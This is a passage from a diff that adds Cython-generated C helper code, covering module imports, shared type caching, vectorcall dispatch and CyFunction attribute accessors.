0x030600B1 + PyExc_ModuleNotFoundError, +#else + PyExc_ImportError, +#endif + "No module named '%U'", partial_name); +#endif +bad: + Py_XDECREF(sep); + Py_XDECREF(slice); + Py_XDECREF(partial_name); + return NULL; +} +#endif +#if PY_MAJOR_VERSION >= 3 +static PyObject *__Pyx__ImportDottedModule_Lookup(PyObject *name) { + PyObject *imported_module; +#if PY_VERSION_HEX < 0x030700A1 || (CYTHON_COMPILING_IN_PYPY && PYPY_VERSION_NUM < 0x07030400) + PyObject *modules = PyImport_GetModuleDict(); + if (unlikely(!modules)) + return NULL; + imported_module = __Pyx_PyDict_GetItemStr(modules, name); + Py_XINCREF(imported_module); +#else + imported_module = PyImport_GetModule(name); +#endif + return imported_module; +} +#endif +#if PY_MAJOR_VERSION >= 3 +static PyObject *__Pyx_ImportDottedModule_WalkParts(PyObject *module, PyObject *name, PyObject *parts_tuple) { + Py_ssize_t i, nparts; + nparts = PyTuple_GET_SIZE(parts_tuple); + for (i=1; i < nparts && module; i++) { + PyObject *part, *submodule; +#if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + part = PyTuple_GET_ITEM(parts_tuple, i); +#else + part = PySequence_ITEM(parts_tuple, i); +#endif + submodule = __Pyx_PyObject_GetAttrStrNoError(module, part); +#if !(CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS) + Py_DECREF(part); +#endif + Py_DECREF(module); + module = submodule; + } + if (unlikely(!module)) { + return __Pyx__ImportDottedModule_Error(name, parts_tuple, i); + } + return module; +} +#endif +static PyObject *__Pyx__ImportDottedModule(PyObject *name, PyObject *parts_tuple) { +#if PY_MAJOR_VERSION < 3 + PyObject *module, *from_list, *star = __pyx_n_s__7; + CYTHON_UNUSED_VAR(parts_tuple); + from_list = PyList_New(1); + if (unlikely(!from_list)) + return NULL; + Py_INCREF(star); + PyList_SET_ITEM(from_list, 0, star); + module = __Pyx_Import(name, from_list, 0); + Py_DECREF(from_list); + return module; +#else + PyObject *imported_module; + PyObject *module = __Pyx_Import(name, NULL, 0); + if (!parts_tuple || unlikely(!module)) + return module; + imported_module = __Pyx__ImportDottedModule_Lookup(name); + if (likely(imported_module)) { + Py_DECREF(module); + return imported_module; + } + PyErr_Clear(); + return __Pyx_ImportDottedModule_WalkParts(module, name, parts_tuple); +#endif +} +static PyObject *__Pyx_ImportDottedModule(PyObject *name, PyObject *parts_tuple) { +#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX >= 0x030400B1 + PyObject *module = __Pyx__ImportDottedModule_Lookup(name); + if (likely(module)) { + PyObject *spec = __Pyx_PyObject_GetAttrStrNoError(module, __pyx_n_s_spec); + if (likely(spec)) { + PyObject *unsafe = __Pyx_PyObject_GetAttrStrNoError(spec, __pyx_n_s_initializing); + if (likely(!unsafe || !__Pyx_PyObject_IsTrue(unsafe))) { + Py_DECREF(spec); + spec = NULL; + } + Py_XDECREF(unsafe); + } + if (likely(!spec)) { + PyErr_Clear(); + return module; + } + Py_DECREF(spec); + Py_DECREF(module); + } else if (PyErr_Occurred()) { + PyErr_Clear(); + } +#endif + return __Pyx__ImportDottedModule(name, parts_tuple); +} + +/* ImportFrom */ +static PyObject* __Pyx_ImportFrom(PyObject* module, PyObject* name) { + PyObject* value = __Pyx_PyObject_GetAttrStr(module, name); + if (unlikely(!value) && PyErr_ExceptionMatches(PyExc_AttributeError)) { + const char* module_name_str = 0; + PyObject* module_name = 0; + PyObject* module_dot = 0; + PyObject* full_name = 0; + PyErr_Clear(); + module_name_str = PyModule_GetName(module); + if (unlikely(!module_name_str)) { goto modbad; } + module_name = PyUnicode_FromString(module_name_str); + if (unlikely(!module_name)) { goto modbad; } + module_dot = PyUnicode_Concat(module_name, __pyx_kp_u__8); + if (unlikely(!module_dot)) { goto modbad; } + full_name = PyUnicode_Concat(module_dot, name); + if (unlikely(!full_name)) { goto modbad; } + #if PY_VERSION_HEX < 0x030700A1 || (CYTHON_COMPILING_IN_PYPY && PYPY_VERSION_NUM < 0x07030400) + { + PyObject *modules = PyImport_GetModuleDict(); + if (unlikely(!modules)) + goto modbad; + value = PyObject_GetItem(modules, full_name); + } + #else + value = PyImport_GetModule(full_name); + #endif + modbad: + Py_XDECREF(full_name); + Py_XDECREF(module_dot); + Py_XDECREF(module_name); + } + if (unlikely(!value)) { + PyErr_Format(PyExc_ImportError, + #if PY_MAJOR_VERSION < 3 + "cannot import name %.230s", PyString_AS_STRING(name)); + #else + "cannot import name %S", name); + #endif + } + return value; +} + +/* FetchSharedCythonModule */ +static PyObject *__Pyx_FetchSharedCythonABIModule(void) { + PyObject *abi_module = PyImport_AddModule((char*) __PYX_ABI_MODULE_NAME); + if (unlikely(!abi_module)) return NULL; + Py_INCREF(abi_module); + return abi_module; +} + +/* FetchCommonType */ +static int __Pyx_VerifyCachedType(PyObject *cached_type, + const char *name, + Py_ssize_t basicsize, + Py_ssize_t expected_basicsize) { + if (!PyType_Check(cached_type)) { + PyErr_Format(PyExc_TypeError, + "Shared Cython type %.200s is not a type object", name); + return -1; + } + if (basicsize != expected_basicsize) { + PyErr_Format(PyExc_TypeError, + "Shared Cython type %.200s has the wrong size, try recompiling", + name); + return -1; + } + return 0; +} +#if !CYTHON_USE_TYPE_SPECS +static PyTypeObject* __Pyx_FetchCommonType(PyTypeObject* type) { + PyObject* abi_module; + const char* object_name; + PyTypeObject *cached_type = NULL; + abi_module = __Pyx_FetchSharedCythonABIModule(); + if (!abi_module) return NULL; + object_name = strrchr(type->tp_name, '.'); + object_name = object_name ? object_name+1 : type->tp_name; + cached_type = (PyTypeObject*) PyObject_GetAttrString(abi_module, object_name); + if (cached_type) { + if (__Pyx_VerifyCachedType( + (PyObject *)cached_type, + object_name, + cached_type->tp_basicsize, + type->tp_basicsize) < 0) { + goto bad; + } + goto done; + } + if (!PyErr_ExceptionMatches(PyExc_AttributeError)) goto bad; + PyErr_Clear(); + if (PyType_Ready(type) < 0) goto bad; + if (PyObject_SetAttrString(abi_module, object_name, (PyObject *)type) < 0) + goto bad; + Py_INCREF(type); + cached_type = type; +done: + Py_DECREF(abi_module); + return cached_type; +bad: + Py_XDECREF(cached_type); + cached_type = NULL; + goto done; +} +#else +static PyTypeObject *__Pyx_FetchCommonTypeFromSpec(PyObject *module, PyType_Spec *spec, PyObject *bases) { + PyObject *abi_module, *cached_type = NULL; + const char* object_name = strrchr(spec->name, '.'); + object_name = object_name ? object_name+1 : spec->name; + abi_module = __Pyx_FetchSharedCythonABIModule(); + if (!abi_module) return NULL; + cached_type = PyObject_GetAttrString(abi_module, object_name); + if (cached_type) { + Py_ssize_t basicsize; +#if CYTHON_COMPILING_IN_LIMITED_API + PyObject *py_basicsize; + py_basicsize = PyObject_GetAttrString(cached_type, "__basicsize__"); + if (unlikely(!py_basicsize)) goto bad; + basicsize = PyLong_AsSsize_t(py_basicsize); + Py_DECREF(py_basicsize); + py_basicsize = 0; + if (unlikely(basicsize == (Py_ssize_t)-1) && PyErr_Occurred()) goto bad; +#else + basicsize = likely(PyType_Check(cached_type)) ? ((PyTypeObject*) cached_type)->tp_basicsize : -1; +#endif + if (__Pyx_VerifyCachedType( + cached_type, + object_name, + basicsize, + spec->basicsize) < 0) { + goto bad; + } + goto done; + } + if (!PyErr_ExceptionMatches(PyExc_AttributeError)) goto bad; + PyErr_Clear(); + CYTHON_UNUSED_VAR(module); + cached_type = __Pyx_PyType_FromModuleAndSpec(abi_module, spec, bases); + if (unlikely(!cached_type)) goto bad; + if (unlikely(__Pyx_fix_up_extension_type_from_spec(spec, (PyTypeObject *) cached_type) < 0)) goto bad; + if (PyObject_SetAttrString(abi_module, object_name, cached_type) < 0) goto bad; +done: + Py_DECREF(abi_module); + assert(cached_type == NULL || PyType_Check(cached_type)); + return (PyTypeObject *) cached_type; +bad: + Py_XDECREF(cached_type); + cached_type = NULL; + goto done; +} +#endif + +/* PyVectorcallFastCallDict */ +#if CYTHON_METH_FASTCALL +static PyObject *__Pyx_PyVectorcall_FastCallDict_kw(PyObject *func, __pyx_vectorcallfunc vc, PyObject *const *args, size_t nargs, PyObject *kw) +{ + PyObject *res = NULL; + PyObject *kwnames; + PyObject **newargs; + PyObject **kwvalues; + Py_ssize_t i, pos; + size_t j; + PyObject *key, *value; + unsigned long keys_are_strings; + Py_ssize_t nkw = PyDict_GET_SIZE(kw); + newargs = (PyObject **)PyMem_Malloc((nargs + (size_t)nkw) * sizeof(args[0])); + if (unlikely(newargs == NULL)) { + PyErr_NoMemory(); + return NULL; + } + for (j = 0; j < nargs; j++) newargs[j] = args[j]; + kwnames = PyTuple_New(nkw); + if (unlikely(kwnames == NULL)) { + PyMem_Free(newargs); + return NULL; + } + kwvalues = newargs + nargs; + pos = i = 0; + keys_are_strings = Py_TPFLAGS_UNICODE_SUBCLASS; + while (PyDict_Next(kw, &pos, &key, &value)) { + keys_are_strings &= Py_TYPE(key)->tp_flags; + Py_INCREF(key); + Py_INCREF(value); + PyTuple_SET_ITEM(kwnames, i, key); + kwvalues[i] = value; + i++; + } + if (unlikely(!keys_are_strings)) { + PyErr_SetString(PyExc_TypeError, "keywords must be strings"); + goto cleanup; + } + res = vc(func, newargs, nargs, kwnames); +cleanup: + Py_DECREF(kwnames); + for (i = 0; i < nkw; i++) + Py_DECREF(kwvalues[i]); + PyMem_Free(newargs); + return res; +} +static CYTHON_INLINE PyObject *__Pyx_PyVectorcall_FastCallDict(PyObject *func, __pyx_vectorcallfunc vc, PyObject *const *args, size_t nargs, PyObject *kw) +{ + if (likely(kw == NULL) || PyDict_GET_SIZE(kw) == 0) { + return vc(func, args, nargs, NULL); + } + return __Pyx_PyVectorcall_FastCallDict_kw(func, vc, args, nargs, kw); +} +#endif + +/* CythonFunctionShared */ +static CYTHON_INLINE void __Pyx__CyFunction_SetClassObj(__pyx_CyFunctionObject* f, PyObject* classobj) { +#if PY_VERSION_HEX < 0x030900B1 + __Pyx_Py_XDECREF_SET( + __Pyx_CyFunction_GetClassObj(f), + ((classobj) ? __Pyx_NewRef(classobj) : NULL)); +#else + __Pyx_Py_XDECREF_SET( + ((PyCMethodObject *) (f))->mm_class, + (PyTypeObject*)((classobj) ? __Pyx_NewRef(classobj) : NULL)); +#endif +} +static PyObject * +__Pyx_CyFunction_get_doc(__pyx_CyFunctionObject *op, void *closure) +{ + CYTHON_UNUSED_VAR(closure); + if (unlikely(op->func_doc == NULL)) { + if (((PyCFunctionObject*)op)->m_ml->ml_doc) { +#if PY_MAJOR_VERSION >= 3 + op->func_doc = PyUnicode_FromString(((PyCFunctionObject*)op)->m_ml->ml_doc); +#else + op->func_doc = PyString_FromString(((PyCFunctionObject*)op)->m_ml->ml_doc); +#endif + if (unlikely(op->func_doc == NULL)) + return NULL; + } else { + Py_INCREF(Py_None); + return Py_None; + } + } + Py_INCREF(op->func_doc); + return op->func_doc; +} +static int +__Pyx_CyFunction_set_doc(__pyx_CyFunctionObject *op, PyObject *value, void *context) +{ + CYTHON_UNUSED_VAR(context); + if (value == NULL) { + value = Py_None; + } + Py_INCREF(value); + __Pyx_Py_XDECREF_SET(op->func_doc, value); + return 0; +} +static PyObject * +__Pyx_CyFunction_get_name(__pyx_CyFunctionObject *op, void *context) +{ + CYTHON_UNUSED_VAR(context); + if (unlikely(op->func_name == NULL)) { +#if PY_MAJOR_VERSION >= 3 + op->func_name = PyUnicode_InternFromString(((PyCFunctionObject*)op)->m_ml->ml_name); +#else + op->func_name = PyString_InternFromString(((PyCFunctionObject*)op)->m_ml->ml_name); +#endif + if (unlikely(op->func_name == NULL)) + return NULL; + } + Py_INCREF(op->func_name); + return op->func_name; +} +static int +__Pyx_CyFunction_set_name(__pyx_CyFunctionObject *op, PyObject *value, void *context) +{ + CYTHON_UNUSED_VAR(context); +#if PY_MAJOR_VERSION >= 3 + if (unlikely(value == NULL || !PyUnicode_Check(value))) +#else + if (unlikely(value == NULL || !PyString_Check(value))) +#endif + { + PyErr_SetString(PyExc_TypeError, + "__name__ must be set to a string object"); + return -1; + } + Py_INCREF(value); + __Pyx_Py_XDECREF_SET(op->func_name, value); + return 0; +} +static PyObject * +__Pyx_CyFunction_get_qualname(__pyx_CyFunctionObject *op, void *context) +{ + CYTHON_UNUSED_VAR(context); + Py_INCREF(op->func_qualname); + return op->func_qualname; +} +static int +__Pyx_CyFunction_set_qualname(__pyx_CyFunctionObject *op, PyObject *value, void *context) +{ + CYTHON_UNUSED_VAR(context); +#if PY_MAJOR_VERSION >= 3 + if (unlikely(value == NULL || !PyUnicode_Check(value))) +#else + if (unlikely(value == NULL || !PyString_Check(value))) +#endif + { + PyErr_SetString(PyExc_TypeError, + "__qualname__ must be set to a string object"); + return -1; + } + Py_INCREF(value); + __Pyx_Py_XDECREF_SET(op->func_qualname, value); + return 0; +} +static PyObject * +__Pyx_CyFunction_get_dict(__pyx_CyFunctionObject *op, void *context) +{ + CYTHON_UNUSED_VAR(context); + if (unlikely(op->func_dict == NULL)) { + op->func_dict = PyDict_New(); + if (unlikely(op->func_dict == NULL)) + return NULL; + } + Py_INCREF(op->func_dict); + return op->func_dict; +} +static int +__Pyx_CyFunction_set_dict(__pyx_CyFunctionObject *op, PyObject *value, void *context) +{ + CYTHON_UNUSED_VAR(context); + if (unlikely(value == NULL)) { + PyErr_SetString(PyExc_TypeError, + "function's dictionary may not be deleted"); + return -1; + } + if (unlikely(!PyDict_Check(value))) { + PyErr_SetString(PyExc_TypeError, + "setting function's dictionary to a non-dict"); + return -1; + } + Py_INCREF(value); + __Pyx_Py_XDECREF_SET(op->func_dict, value); + return 0; +} +static PyObject * +__Pyx_CyFunction_get_globals(__pyx_CyFunctionObject *op, void *context) +{ + CYTHON_UNUSED_VAR(context); + Py_INCREF(op->func_globals); + return op->func_globals; +} +static PyObject * +__Pyx_CyFunction_get_closure(__pyx_CyFunctionObject *op, void *context) +{ + CYTHON_UNUSED_VAR(op); + CYTHON_UNUSED_VAR(context); + Py_INCREF(Py_None); + return Py_None; +} +static PyObject * +__Pyx_CyFunction_get_code(__pyx_CyFunctionObject *op, void *context) +{ + PyObject* result = (op->func_code) ? op->func_code : Py_None; + CYTHON_UNUSED_VAR(context); + Py_INCREF(result); + return result; +} +static int +__Pyx_CyFunction_init_defaults(__pyx_CyFunctionObject *op) { + int result = 0; + PyObject *res = op->defaults_getter((PyObject *) op); + if (unlikely(!res)) + return -1; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + op->defaults_tuple = PyTuple_GET_ITEM(res, 0); + Py_INCREF(op->defaults_tuple); + op->defaults_kwdict = PyTuple_GET_ITEM(res, 1); + Py_INCREF(op->defaults_kwdict); + #else + op->defaults_tuple = PySequence_ITEM(res, 0); + if (unlikely(!op->defaults_tuple)) result = -1; + else { + op->defaults_kwdict = PySequence_ITEM(res, 1); + if (unlikely(!op->defaults_kwdict)) result = -1; + } + #endif + Py_DECREF(res); + return result; +} +static int +__Pyx_CyFunction_set_defaults(__pyx_CyFunctionObject *op, PyObject* value, void *context) { + CYTHON_UNUSED_VAR(context); + if (!value) { + value = Py_None; + } else if (unlikely(value != Py_None && !PyTuple_Check(value))) { + PyErr_SetString(PyExc_TypeError, + "__defaults__ must be set to a tuple object"); + return -1; + } + PyErr_WarnEx(PyExc_RuntimeWarning, "changes to cyfunction.__defaults__ will not " + "currently affect the values used in function calls", 1); + Py_INCREF(value); + __Pyx_Py_XDECREF_SET(op->defaults_tuple, value); + return 0; +} +static PyObject * +__Pyx_CyFunction_get_defaults(__pyx_CyFunctionObject *op, void *context) { + PyObject* result = op->defaults_tuple; + CYTHON_UNUSED_VAR(context); + if (unlikely(!result)) { + if (op->defaults_getter) { + if (unlikely(__Pyx_CyFunction_init_defaults(op) < 0)) return NULL; + result = op->defaults_tuple; + } else { + result = Py_None; + } + } + Py_INCREF(result); + return result; +} +static int +__Pyx_CyFunction_set_kwdefaults(__pyx_CyFunctionObject *op, PyObject* value, void *context) { + CYTHON_UNUSED_VAR(context); + if (!value) { + value = Py_None; + } else if (unlikely(value != Py_None && !PyDict_Check(value))) { + PyErr_SetString(PyExc_TypeError, + "__kwdefaults__ must be set to a dict object"); + return -1; + } + PyErr_WarnEx(PyExc_RuntimeWarning, "changes to cyfunction.__kwdefaults__ will not " + "currently affect the values used in function calls", 1); + Py_INCREF(value); + __Pyx_Py_XDECREF_SET(op->defaults_kwdict, value); + return 0; +} +static PyObject * +__Pyx_CyFunction_get_kwdefaults(__pyx_CyFunctionObject *op, void *context) { + PyObject* result = op->defaults_kwdict; + CYTHON_UNUSED_VAR(context); + if (unlikely(!result)) { + if (op->defaults_getter) { + if (unlikely(__Pyx_CyFunction_init_defaults(op) < 0)) return NULL; + result = op->defaults_kwdict; + } else { + result = Py_None; + } + } + Py_INCREF(result); + return result; +} +static int +__Pyx_CyFunction_set_annotations(__pyx_CyFunctionObject *op, PyObject* value, void *context) { + CYTHON_UNUSED_VAR(context); + if (!value || value == Py_None) { + value = NULL; + } else if (unlikely(!PyDict_Check(value))) { + PyErr_SetString(PyExc_TypeError, + "__annotations__ must be set to a dict object"); + return -1; + } + Py_XINCREF(value); + __Pyx_Py_XDECREF_SET(op->func_annotations, value); + return 0; +} +static PyObject * +__Pyx_CyFunction_get_annotations(__pyx_CyFunctionObject *op, void *context) { + PyObject* result = op->func_annotations; + CYTHON_UNUSED_VAR(context); + if (unlikely(!result)) { + result = PyDict_New(); + if (unlikely(!result)) return NULL; + op->func_annotations = result; + } + Py_INCREF(result); + return result; +} +static PyObject * +__Pyx_CyFunction_get_is_coroutine(__pyx_CyFunctionObject *op, void *context) { + int is_coroutine; + CYTHON_UNUSED_VAR(context); + if (op->func_is_coroutine) { + return __Pyx_NewRef(op->func_is_coroutine); + } + is_coroutine = op->flags & __Pyx_CYFUNCTION_COROUTINE; +#if PY_VERSION_HEX >= 0x03050000 + if (is_coroutine) { + PyObject *module, *fromlist, *marker = __pyx_n_s_is_coroutine; + fromlist = PyList_New(1); + if (unlikely(!fromlist)) return NULL; + Py_INCREF(marker); + PyList_SET_ITEM(fromlist, 0, marker); + module = PyImport_ImportModuleLevelObject(__pyx_n_s_asyncio_coroutines, NULL, NULL, fromlist, 0); + Py_DECREF(fromlist); + if (unlikely(!module)) goto ignore; + op->func_is_coroutine = __Pyx_PyObject_GetAttrStr(module, marker); + Py_DECREF(module); + if (likely(op->func_is_coroutine)) { + return __Pyx_NewRef(op->func_is_coroutine); + } +ignore: + PyErr_Clear(); + } +#endif + op->func_is_coroutine = __Pyx_PyBool_FromLong(is_coroutine); + return __Pyx_NewRef(op->func_is_coroutine); +} +static PyGetSetDef __pyx_CyFunction_getsets[] = { + {(char *) "func_doc", (getter)__Pyx_CyFunction_get_doc, (setter)__Pyx_CyFunction_set_doc, 0, 0}, + {(char *) "__doc__", (getter)__Pyx_CyFunction_get_doc, (setter)__Pyx_CyFunction_set_doc, 0, 0}, + {(char *) "func_name", (getter)__Pyx_CyFunction_get_name, (setter)__Pyx_CyFunction_set_name, 0, 0}, + {(char *) "__name__", (getter)__Pyx_CyFunction_get_name, (setter)__Pyx_CyFunction_set_name, 0, 0}, + {(char *) "__qualname__", (getter)__Pyx_CyFunction_get_qualname, (setter)__Pyx_CyFunction_set_qualname, 0, 0}, + {(char *) "func_dict", (getter)__Pyx_CyFunction_get_dict, (setter)__Pyx_CyFunction_set_dict, 0, 0}, + {(char *) "__dict__", (getter)__Pyx_CyFunction_get_dict, (setter)__Pyx_CyFunction_set_dict, 0, 0}, + {(char *) "func_globals", (getter)__Pyx_CyFunction_get_globals, 0, 0, 0}, + {(char *) "__globals__", (getter)__Pyx_CyFunction_get_globals, 0, 0, 0}, + {(char *) "func_closure", (getter)__Pyx_CyFunction_get_closure, 0, 0, 0}, + {(char *) "__closure__", (getter)__Pyx_CyFunction_get_closure, 0, 0, 0}, + {(char *) "func_code", (getter)__Pyx_CyFunction_get_code, 0, 0, 0}, + {(char *) "__code__", (getter)__Pyx_CyFunction_get_code, 0, 0, 0}, + {(char *) "func_defaults", (getter)__Pyx_CyFunction_get_defaults, (setter)__Pyx_CyFunction_set_defaults, 0, 0}, + {(char *) "__defaults__", (getter)__Pyx_CyFunction_get_defaults, (setter)__Pyx_CyFunction_set_defaults, 0, 0}, + {(char *) "__kwdefaults__", (getter)__Pyx_CyFunction_get_kwdefaults, (setter)__Pyx_CyFunction_set_kwdefaults, 0, 0}, + {(char *) "__annotations__", (getter)__Pyx_CyFunction_get_annotations, (setter)__Pyx_CyFunction_set_annotations, 0, 0}, + {(char *) "_is_coroutine", (getter)__Pyx_CyFunction_get_is_coroutine, 0, 0, 0}, + {0, 0, 0, 0, 0} +}; +static PyMemberDef __pyx_CyFunction_members[] = { + {(char *) "__module__", T_OBJECT, offsetof(PyCFunctionObject, m_module), 0, 0}, +#if CYTHON_USE_TYPE_SPECS + {(char *) "__dictoffset__", T_PYSSIZET, offsetof(__pyx_CyFunctionObject, func_dict), READONLY, 0}, +#if CYTHON_METH_FASTCALL +#if CYTHON_BACKPORT_VECTORCALL + {(char *) "__vectorcalloffset__", T_PYSSIZET, offsetof(__pyx_CyFunctionObject, func_vectorcall), READONLY, 0}, +#else + {(char *) "__vectorcalloffset__", T_PYSSIZET, offsetof(PyCFunctionObject, vectorcall), READONLY, 0}, +#endif +#endif +#if PY_VERSION_HEX < 0x030500A0 + {(char *) "__weaklistoffset__", T_PYSSIZET, offsetof(__pyx_CyFunctionObject, func_weakreflist), READONLY, 0}, +#else + {(char *) "__weaklistoffset__", T_PYSSIZET, offsetof(PyCFunctionObject, m_weakreflist), READONLY, 0}, +#endif +#endif + {0, 0, 0, 0, 0} +}; +static PyObject * +__Pyx_CyFunction_reduce(__pyx_CyFunctionObject *m, PyObject *args) +{ + CYTHON_UNUSED_VAR(args); +#if PY_MAJOR_VERSION >= 3 + Py_INCREF(m->func_qualname); + return m->func_qualname; +#else + return PyString_FromString(((PyCFunctionObject*)m)->m_ml->ml_name); +#endif +} +static PyMethodDef __pyx_CyFunction_methods[] = { + {"__reduce__", (PyCFunction)__Pyx_CyFunction_reduce, METH_VARARGS, 0}, + {0, 0, 0, 0} +}; +#if PY_VERSION_HEX < 0x030500A0 +#define __Pyx_CyFunction_weakreflist(cyfunc) ((cyfunc)->func_weakreflist) +#else +#define __Pyx_CyFunction_weakreflist(cyfunc) (((PyCFunctionObject*)cyfunc)->m_weakreflist) +#endif +static PyObject *__Pyx_CyFunction_Init(__pyx_CyFunctionObject *op, PyMethodDef *ml, int flags, PyObject* qualname, + PyObject *closure, PyObject *module, PyObject* globals, PyObject* code) { + PyCFunctionObject *cf = (PyCFunctionObject*) op; + if (unlikely(op == NULL)) + return NULL; + op->flags = flags; + __Pyx_CyFunction_weakreflist(op) = NULL; + cf->m_ml = ml; + cf->m_self = (PyObject *) op; + Py_XINCREF(closure); + op->func_closure = closure; + Py_XINCREF(module); + cf->m_module = module; + op->func_dict = NULL; + op->func_name = NULL; + Py_INCREF(qualname); + op->func_qualname = qualname; + op->func_doc = NULL; +#if PY_VERSION_HEX < 0x030900B1 + op->func_classobj = NULL; +#else + ((PyCMethodObject*)op)->mm_class = NULL; +#endif + op->func_globals = globals; + Py_INCREF(op->func_globals); + Py_XINCREF(code); + op->func_code = code; + op->defaults_pyobjects = 0; + op->defaults_size = 0; + op->defaults = NULL; + op->defaults_tuple = NULL; + op->defaults_kwdict = NULL; + op->defaults_getter = NULL; + op->func_annotations = NULL; + op->func_is_coroutine = NULL; +#if CYTHON_METH_FASTCALL + switch (ml->ml_flags & (METH_VARARGS | METH_FASTCALL | METH_NOARGS | METH_O | METH_KEYWORDS | METH_METHOD)) { + case METH_NOARGS: + __Pyx_CyFunction_func_vectorcall(op) = __Pyx_CyFunction_Vectorcall_NOARGS; + break; + case METH_O: + __Pyx_CyFunction_func_vectorcall(op) = __Pyx_CyFunction_Vectorcall_O; + break; + case METH_METHOD | METH_FASTCALL | METH_KEYWORDS: + __Pyx_CyFunction_func_vectorcall(op) = __Pyx_CyFunction_Vectorcall_FASTCALL_KEYWORDS_METHOD; + break; + case METH_FASTCALL | METH_KEYWORDS: + __Pyx_CyFunction_func_vectorcall(op) = __Pyx_CyFunction_Vectorcall_FASTCALL_KEYWORDS; + break; + case METH_VARARGS | METH_KEYWORDS: + __Pyx_CyFunction_func_vectorcall(op) = NULL; + break; + default: + PyErr_SetString(PyExc_SystemError, "Bad call flags for CyFunction"); + Py_DECREF(op); + return NULL; + } +#endif + return (PyObject *) op; +} +static int +__Pyx_CyFunction_clear(__pyx_CyFunctionObject *m) +{ + Py_CLEAR(m->func_closure); + Py_CLEAR(((PyCFunctionObject*)m)->m_module); + Py_CLEAR(m->func_dict); + Py_CLEAR(m->func_name); + Py_CLEAR(m->func_qualname); + Py_CLEAR(m->func_doc); + Py_CLEAR(m->func_globals); + Py_CLEAR(m->func_code); +#if PY_VERSION_HEX < 0x030900B1 + Py_CLEAR(__Pyx_CyFunction_GetClassObj(m)); +#else + { + PyObject *cls = (PyObject*) ((PyCMethodObject *) (m))->mm_class; + ((PyCMethodObject *) (m))->mm_class = NULL; + Py_XDECREF(cls); + } +#endif + Py_CLEAR(m->defaults_tuple); + Py_CLEAR(m->defaults_kwdict); + Py_CLEAR(m->func_annotations); + Py_CLEAR(m->func_is_coroutine); + if (m->defaults) { + PyObject **pydefaults = __Pyx_CyFunction_Defaults(PyObject *, m); + int i; + for (i = 0; i < m->defaults_pyobjects; i++) + Py_XDECREF(pydefaults[i]); + PyObject_Free(m->defaults); + m->defaults = NULL; + } + return 0; +} +static void __Pyx__CyFunction_dealloc(__pyx_CyFunctionObject *m) +{ + if (__Pyx_CyFunction_weakreflist(m) != NULL) + PyObject_ClearWeakRefs((PyObject *) m); + __Pyx_CyFunction_clear(m); + __Pyx_PyHeapTypeObject_GC_Del(m); +} +static void __Pyx_CyFunction_dealloc(__pyx_CyFunctionObject *m) +{ + PyObject_GC_UnTrack(m); + __Pyx__CyFunction_dealloc(m); +} +static int __Pyx_CyFunction_traverse(__pyx_CyFunctionObject *m, visitproc visit, void *arg) +{ + Py_VISIT(m->func_closure); + Py_VISIT(((PyCFunctionObject*)m)->m_module); + Py_VISIT(m->func_dict); + Py_VISIT(m->func_name); + Py_VISIT(m->func_qualname); + Py_VISIT(m->func_doc); + Py_VISIT(m->func_globals); + Py_VISIT(m->func_code); + Py_VISIT(__Pyx_CyFunction_GetClassObj(m)); + Py_VISIT(m->defaults_tuple); + Py_VISIT(m->defaults_kwdict); + Py_VISIT(m->func_is_coroutine); + if (m->defaults) { + PyObject **pydefaults = __Pyx_CyFunction_Defaults(PyObject *, m); + int i; + for (i = 0; i < m->defaults_pyobjects; i++) + Py_VISIT(pydefaults[i]); + } + return 0; +} +static PyObject* +__Pyx_CyFunction_repr(__pyx_CyFunctionObject *op) +{ +#if PY_MAJOR_VERSION >= 3 + return PyUnicode_FromFormat("", + op->func_qualname, (void *)op); +#else + return PyString_FromFormat("", + PyString_AsString(op->func_qualname), (void *)op); +#endif +} +static PyObject * __Pyx_CyFunction_CallMethod(PyObject *func, PyObject *self, PyObject *arg, PyObject *kw) { + PyCFunctionObject* f = (PyCFunctionObject*)func; + PyCFunction meth = f->m_ml->ml_meth; + Py_ssize_t size; + switch (f->m_ml->ml_flags & (METH_VARARGS | METH_KEYWORDS | METH_NOARGS | METH_O)) { + case METH_VARARGS: + if (likely(kw == NULL || PyDict_Size(kw) == 0)) + return (*meth)(self, arg); + break; + case METH_VARARGS | METH_KEYWORDS: + return (*(PyCFunctionWithKeywords)(void*)meth)(self, arg, kw); + case METH_NOARGS: + if (likely(kw == NULL || PyDict_Size(kw) == 0)) { + size = PyTuple_GET_SIZE(arg); + if (likely(size == 0)) + return (*meth)(self, NULL); + PyErr_Format(PyExc_TypeError, + "%.200s() takes no arguments (%" CYTHON_FORMAT_SSIZE_T "d given)", + f->m_ml->ml_name, size); + return NULL; + } + break; + case METH_O: + if (likely(kw == NULL || PyDict_Size(kw) == 0)) { + size = PyTuple_GET_SIZE(arg); + if (likely(size == 1)) { + PyObject *result, *arg0; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + arg0 = PyTuple_GET_ITEM(arg, 0); + #else + arg0 = PySequence_ITEM(arg, 0); if (unlikely(!arg0)) return NULL; + #endif + result = (*meth)(self, arg0); + #if !(CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS) + Py_DECREF(arg0); + #endif + return result; + } + PyErr_Format(PyExc_TypeError, + "%.200s() takes exactly one argument (%" CYTHON_FORMAT_SSIZE_T "d given)", + f->m_ml->ml_name, size); + return NULL; + } + break; + default: + PyErr_SetString(PyExc_SystemError, "Bad call flags for CyFunction"); + return NULL; + } + PyErr_Format(PyExc_TypeError, "%.200s() takes no keyword arguments", + f->m_ml->ml_name); + return NULL; +} +static CYTHON_INLINE PyObject *__Pyx_CyFunction_Call(PyObject *func, PyObject *arg, PyObject *kw) { + return __Pyx_CyFunction_CallMethod(func, ((PyCFunctionObject*)func)->m_self, arg, kw); +} +static PyObject *__Pyx_CyFunction_CallAsMethod(PyObject *func, PyObject *args, PyObject *kw) { + PyObject *result; + __pyx_CyFunctionObject *cyfunc = (__pyx_CyFunctionObject *) func; +#if CYTHON_METH_FASTCALL + __pyx_vectorcallfunc vc = __Pyx_CyFunction_func_vectorcall(cyfunc); + if (vc) { +#if CYTHON_ASSUME_SAFE_MACROS + return __Pyx_PyVectorcall_FastCallDict(func, vc, &PyTuple_GET_ITEM(args, 0), (size_t)PyTuple_GET_SIZE(args), kw); +#else + (void) &__Pyx_PyVectorcall_FastCallDict; + return PyVectorcall_Call(func, args, kw); +#endif + 